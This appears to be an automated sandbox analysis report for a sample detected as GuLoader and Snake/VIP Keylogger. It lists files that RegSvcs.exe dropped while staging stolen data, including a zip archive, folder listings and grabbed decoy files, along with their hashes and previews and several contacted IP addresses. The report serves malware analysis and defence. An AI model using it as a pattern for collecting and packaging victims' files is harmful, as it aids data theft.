	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.196.114 172.67.19.24

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH.zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	modified
Size (bytes):	188596
Entropy (8bit):	7.917818629412001
Encrypted:	false
SSDEEP:	3072:NHrHKHnH8HzHCHjHxHiHvNuSsFATAU9IY3mvaOORULTL:FIfyTAgmvaOS6/
MD5:	94A33DFC902590EB45A108C76FE10522
SHA1:	80E31CB2758D0F2858DF13DFB764F2A34CA09051
SHA-256:	527B783D39C3F904224A8EA80B55944B1BFF9D2325E6334C13C8294143FB8BA1
SHA-512:	15EBC550B4348F11D1A9F01BF01E9B99444CF3BE12FB52BBF04148B748DE25137BA987855F1E2CECBCEEADEE0B161AB1BA7B4FD8611EAF3ABD7EB93238BF3DC2
Malicious:	false
Preview:	PK........D.Z................Browsers\Edge\PK........D.Z................Browsers\Google\PK.........iZQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK.........iZ..0s....5.......Directories\Desktop.txteS.N.0.<.._..$.v....:/..j...6.....nB.8.....o._?....nA.........U......J....TQ...MU......-kU....S....P...zv.Z2..C...,W..d...4..N..a.i.yY$...c.4......oWem.Ix$b^..w<eQ.LL.Wh....2.q...@...../...L.&.V\..L.F\.g{G.eZ..S.]5.....KeB..{.......H;.7...)(.R@...;j....K.+..K..od.........tG....#.>..i.....=\|..i..w.....0....F...l.>......8..=.._.......,........C.A...F.c..../PK.........iZ...............Directories\Documents.txtmS.r. .<+U..\|..... ...^$...,.vmK....o .R4{.a....2....\|..<>..J1..,..p..R.Hr[.-.ox%b[.y.J....V....MQ.yx..mg.....a[\(U.h..p:....I%I.H.N.O.IRR.,m....f.]V...H.~.g.....:..\|-*.,.=.6.j.&...Vd<..S.UL..l4CJ..X...........:E...$.`.e...W....4C..s^.......u......?.q....u......;..h....O.x<.

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1077
Entropy (8bit):	5.230214098871027
Encrypted:	false
SSDEEP:	24:JOsj7uyaxeB6ysGO1sMYLWWsVAnupkkvdPfVRKTjjujVYjf:4sj74xeB6ysV1rYXs+nUNdPfVRKTjjug
MD5:	B09D6BE6385823722BFDDB2F1C545E10
SHA1:	3C30822867E16D5F3C7352E44026DFF6AA7FA525
SHA-256:	401B0C907F6E9DF7A7141049C9F2878597CB3756B7A9D22DDF595092D7272113
SHA-512:	86EE780ABA2C77377A1290F3911F64B976EBDFB01F3B3EBDF893867D5DAA476549C66B981605761EA08FCFB338C72AD49E844F453B7537C447A87FA69442F056
Malicious:	false
Preview:	Desktop\...ATJBEMHSSB\...BUFZSQPCOH\...DQOFHVHTMG\...GLTYDMDUST\....AQRFEVRTGL.mp3....GLTYDMDUST.docx....HMPPSXQPQV.png....LFOPODGVOH.pdf....LIJDSFKJZG.jpg....UNKRLCVOHV.xlsx...HMPPSXQPQV\....BQJUWOYRTO.jpg....BUFZSQPCOH.png....BWETZDQDIB.mp3....HMPPSXQPQV.docx....LHEPQPGEWF.pdf....QFAPOWPAFG.xlsx...LFOPODGVOH\....AQRFEVRTGL.xlsx....BXAJUJAOEO.jpg....IZMFBFKMEB.mp3....LFOPODGVOH.docx....NIRMEKAMZH.png....QFAPOWPAFG.pdf...PWZOQIFCAN\...UNKRLCVOHV\....AQRFEVRTGL.pdf....BXAJUJAOEO.mp3....LIJDSFKJZG.xlsx....SNIPGPPREP.png....UNKRLCVOHV.docx....WSHEJMDVQC.jpg...VWDFPKGDUF\...WDBWCPEFJW\...WHZAGPPPLA\...WSHEJMDVQC\...6mllsKaB2q.exe...AQRFEVRTGL.mp3...AQRFEVRTGL.pdf...AQRFEVRTGL.xlsx...BQJUWOYRTO.jpg...BUFZSQPCOH.png...BWETZDQDIB.mp3...BXAJUJAOEO.jpg...BXAJUJAOEO.mp3...desktop.ini...Excel.lnk...GLTYDMDUST.docx...HMPPSXQPQV.docx...HMPPSXQPQV.png...IZMFBFKMEB.mp3...LFOPODGVOH.docx...LFOPODGVOH.pdf...LHEPQPGEWF.pdf...LIJDSFKJZG.jpg...LIJDSFKJZG.xlsx...NIRMEKAMZH.png...QFAPOWPAFG.pdf...QFAPOWPAFG

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Documents.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1202
Entropy (8bit):	5.324391734338333
Encrypted:	false
SSDEEP:	24:vOsj7uyaxeB0xrqEEtysGO1sqsVAnupkkvFVRKTjjujVYjf:2sj74xeB0BqEEtysV19s+nUNFVRKTjj9
MD5:	FF2DBCC119BBE30B52D416F94E8D9056
SHA1:	23FD8A89712A925E08B95A51AFA565EA4865217B
SHA-256:	833AC8B05A0BD4DAE88DADC3CB93DFCCF344B14368552D3A07AA28921B4BDB52
SHA-512:	E3D5F4AC72F2A48F289154912D94EF28A2B402EB42DEB8E944A5439928DED39D6151288936B3BD060C30BFDD399F377AB5E2297A6C4C79FBCA94254A61099A42
Malicious:	false
Preview:	Documents\...ATJBEMHSSB\...BUFZSQPCOH\...DQOFHVHTMG\...GLTYDMDUST\....AQRFEVRTGL.mp3....GLTYDMDUST.docx....HMPPSXQPQV.png....LFOPODGVOH.pdf....LIJDSFKJZG.jpg....UNKRLCVOHV.xlsx...HMPPSXQPQV\....BQJUWOYRTO.jpg....BUFZSQPCOH.png....BWETZDQDIB.mp3....HMPPSXQPQV.docx....LHEPQPGEWF.pdf....QFAPOWPAFG.xlsx...LFOPODGVOH\....AQRFEVRTGL.xlsx....BXAJUJAOEO.jpg....IZMFBFKMEB.mp3....LFOPODGVOH.docx....NIRMEKAMZH.png....QFAPOWPAFG.pdf...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...PWZOQIFCAN\...UNKRLCVOHV\....AQRFEVRTGL.pdf....BXAJUJAOEO.mp3....LIJDSFKJZG.xlsx....SNIPGPPREP.png....UNKRLCVOHV.docx....WSHEJMDVQC.jpg...VWDFPKGDUF\...WDBWCPEFJW\...WHZAGPPPLA\...WSHEJMDVQC\...AQRFEVRTGL.mp3...AQRFEVRTGL.pdf...AQRFEVRTGL.xlsx...BQJUWOYRTO.jpg...BUFZSQPCOH.png...BWETZDQDIB.mp3...BXAJUJAOEO.jpg...BXAJUJAOEO.mp3...desktop.ini...GLTYDMDUST.docx...HMPPSXQPQV.docx...HMPPSXQPQV.png...IZMFBFKMEB.mp3...LFOPOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	442
Entropy (8bit):	5.2530492916741585
Encrypted:	false
SSDEEP:	12:CWMIsVjknupGzk4LKk6XrHr6jqgKCojjujqVpGlaSqjVYo:/sVAnupkkvkXRKTjjujVYjf
MD5:	5F57ED4A5A2320D0ED4A00D5CFB78946
SHA1:	38C1E9D7F46CEEF76C9A0CAB1B86EF3690EC674B
SHA-256:	86AB31BA75F46EEF48C28A1574186AB78D758BBC80E3829CD4561C0C207CBF77
SHA-512:	0DFA85D603A74672E8AE5210F804D3D07B2EC9494D7F5960A9D8D7FC1273EDF05B4786F548A772043C15DE364FBFA40CC7FC3406A48D5A02EDCC65A948B73E8C
Malicious:	false
Preview:	Downloads\...AQRFEVRTGL.mp3...AQRFEVRTGL.pdf...AQRFEVRTGL.xlsx...BQJUWOYRTO.jpg...BUFZSQPCOH.png...BWETZDQDIB.mp3...BXAJUJAOEO.jpg...BXAJUJAOEO.mp3...desktop.ini...GLTYDMDUST.docx...GNLQNHOLWB.mp3...HMPPSXQPQV.docx...HMPPSXQPQV.png...LFOPODGVOH.docx...LFOPODGVOH.pdf...LHEPQPGEWF.pdf...LIJDSFKJZG.jpg...LIJDSFKJZG.xlsx...NIRMEKAMZH.png...QFAPOWPAFG.pdf...QFAPOWPAFG.xlsx...SNIPGPPREP.png...UNKRLCVOHV.docx...UNKRLCVOHV.xlsx...WSHEJMDVQC.jpg..

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Startup.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Temp.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6080
Entropy (8bit):	5.224247822669679
Encrypted:	false
SSDEEP:	96:4MaaZelXlJMplDMW+BWJaNy0bkmkdRejiZSB02slOW1HNFMWvqsiGVTvZ29MWX7e:uQatbRku3BgEW1HzBSsiKMY
MD5:	31FEF79109F85026703AAC24D9A54579
SHA1:	A589B3098A1EB779F86D3D8FE896D178D9ECC0AC
SHA-256:	9BA3A3131C18261AB27523A3B34600EBD84F90858D1B2F60297F3904AD58DCF9
SHA-512:	B4FCD161A71A60457576EE20CFB92DF175B8F8DA669A2FECA96F4916C9E9A12AD4BC4ACA985E3E12D27D33BB717B7600822ABA682E3A823BDB931B531B3A3B3B
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 08-42-34-020.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 09-53-40-267.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 09-53-55-791.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696492126647891800_C77A0801-BF9E-4A77-B306-ADE600D7D503.log.....App1696492150176198700_7F03E0AD-1FF3-47CB-9F3F-97D0C5C0A24B.log.....App1696492161568813800_487416EE-F98F-4B97-8774-47B986A4D1F6.log.....App1696492161569268300_487416EE-F98F-4B97-8774-47B986A4D1F6.log...edge_BITS_3244_1042373222\....376d5b20-4ccf-4ab3-92ec-d2fa66fb039b...edge_BITS_3244_1077422325\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_3244_1097730144\....873489b1-33b2-480a-baa2-641b9e09edcd...edge_BITS_3244_1164849323\....ef5f792e-9df7-4748-accf-02ec33a4a2c4...ed

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Directories\Videos.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AQRFEVRTGL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AQRFEVRTGL.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691266297898928
Encrypted:	false
SSDEEP:	24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
MD5:	7D4E714F4EDA4631DCA8D420338392F1
SHA1:	536B4BCBAB5C780738EE2D562D16AB532C9D8E68
SHA-256:	841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
SHA-512:	FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
Malicious:	false
Preview:	AQRFEVRTGLRPNVUMAMHTYETEVGDENHEHZDAQRXZQCDHHLTUZIEJRCQGGPRQWBIYWADWJEZTAELERKZUDZJHSFVIUPBTJVGKYQFWVMPTQUZUZZSOJNBOABYGRCYMPSQARVQUZQVCNVECXPCBIEBYWXWSRMTKFKBEHRJGIPFMOYSZMEELAQPGBHDTUPVXJROQBNFXLTFTPQHVAGKBRLNHZRZVUTEGANMGKVRFJJNOMKLVMQNTHIORPQCPGNIZSOYKXAQJCOPIGBQRJINVPIRVOHHCOGWQPXWQEGDKAHJASRIJBIMZDOWPSCSZZQNZFPNLCIRCXKLGBVXKUJASQXRHFULXFGHARZKMVRSMXPJPUDKEQXOSCEBAKVRLNKSSEVKXVMESKRHMKSXSUKELGCEYTRDUXROEARVKPGFZHNSDRPAQVQVSCJPHBVIRZPYJKRBBZNOUQWXJMMJNDFWGGJPGQMMWRHVVMGZTXMHGJMPQFKEKIAULKOFHNCPDGWVUWIVKGZHFAQVQOBPOUZZTMTUXLURTPHPWRVYABSKGEOJTHCTJYEQSHAVPELOSNLRXFRVWMHJRZTZLGKGNKELBIANUAYANWKNNJPQUXDOBXLYTGIGYZMXXBSVTKCOWSZHFODTFONXVLBRUGJKEZMTIRWSGAANCFOWQHTMLCODGMRHITYHVPOCCXAYGLOXHITQDUATUBKLPLHFHTHTEONDGTWZOQVYRUABLZCNSDXFSTUTQJACVNWWCLMGVDGIDXECYLUJKBUKWQQUERSQSLBAKCXGRYMXSMUPSLSRDICMSQOGBWCATEAACXPGZFMXCSVNIZUQRAQEWTFWYKNKMGGMAZDJHXXORIHLHSPMGKAWZUQOKTRGEGDEPETKDTOVQKFNIASUNQNVNPECXIFOSOXOYCRVRJAKLVRMRCMTVZUHFLJPYFXCUSTATJHRIINTHARIAPEKFSUPRLIGJHIMRLJERLFFTZAQPSMLNNQSZLYNDGBIYC

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BQJUWOYRTO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BUFZSQPCOH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692335641801684
Encrypted:	false
SSDEEP:	24:zH8U6ceY5aV+Ai0xV38519ItLI1uSTaTtR4kYO9TsrMA7PTOGil5:QlUMHi0xVsrsLcn2hmYA7Pc
MD5:	DEF355B17D73C1495713C5488FCE7339
SHA1:	BECA340E4F9D7795A83636020FCF688DA88FA808
SHA-256:	471A7B08733F8B9E8AB162FE426B75361169906D3DD7564B28B19E4DBA14F328
SHA-512:	E95418C8C9F1A763D004E2572EF9D4379878FDD9D222E4605D7A77ED6D86CC764B68B358A7DFA8ED82749B24ED97FCC81139694A031E9B85032AF6CC1F973F67
Malicious:	false
Preview:	BUFZSQPCOHPBYKALHMHLNSRPRTVPDQBUOCQIUAODIUEKAFQGDJEJWAHUKUUNHNODDXVOYWZMQJTURWDHVUCIFBOWJXTDYGJYMUCANKQYYQDAZPDWHSRGGYVPVGUAROKTZQVZRKBJKUQPVSBXUNUVQUXGDDRCCFXNKCRLUTRGZCDJOZFSITBSODAQBZRACSSJHBZJQSWIDQKMDSFONWLGQGIXRSOSOSXFJYJOURMXKTHTKFPJKNLLIXAXMLRXRNSAITLJNMHURDCGMLBSZZGQUPFGUIAACPLZTRSOAQAAYBEWFKSLEZHQMZKSQNGWWBKCCEEXEFKGZNXXZCVVUCQBYNKOAKNKXZAUNQWYVAHGEZRKCYLJESNPTYNSPXUTDFYXGYZZIQICBFFNUPHHCIBKOGMJGNSDDHJIRRFZCCRFOZGNWZGCDMMSOGVDCESUEEHGPRLMKANOQICCTFXCLZEKAGRGLYLWFGMAGHPKQTDONAQKSFPNLTUUXPEUGETZPBEKMCJNCMHTBKTSCNRNVDHIDSZROKAYGDUISPBLTFVLFSAFKYVLQVJPAVOFSSUSZJNMUYOAKUULNRXBYNACAQEKDHCKCIVUYLXHDFNPCCZGNQLMWIUKMGKTRDESXVITCZNHDZOVZEBRZELODDFSSMCHTFHQMHCXBMKZDOFGFTOYNRJPSRASGBJNFZWJWPLWVHAVKBBVTNIPRUSXAFVYCMDUDJRJPWXFBWBCASKRZICWOFTNARKKQDFROZXDUUROLEJYXUQIETKBJKCQLMILRYABQHMQMPXTIBHFCVWURUXTHWCBAFLDWENGHOTDBECRYJDNCGXVYIOAMIANPSNYYMCPEBELRZLSAHCILCJUWSKZHDCDQPSCITMLNPHLHXANDSONCLLAEXJRKDMXZINBJKHEASISSKRWUYGFHFYXHMNYBHGOHNEUAJQYLOQBNHYGIGKJPTHMVWRDOPYXIXGSHDTONANJGYWXHUWUKASCHBKX

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Desktop\BXAJUJAOEO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701111373123985
Encrypted:	false
SSDEEP:	24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
MD5:	CA5A3E2A0C2DDF92EABE165672425976
SHA1:	1933AC1A510945A766039E7E61D7DA4156E0F074
SHA-256:	4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
SHA-512:	64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
Malicious:	false
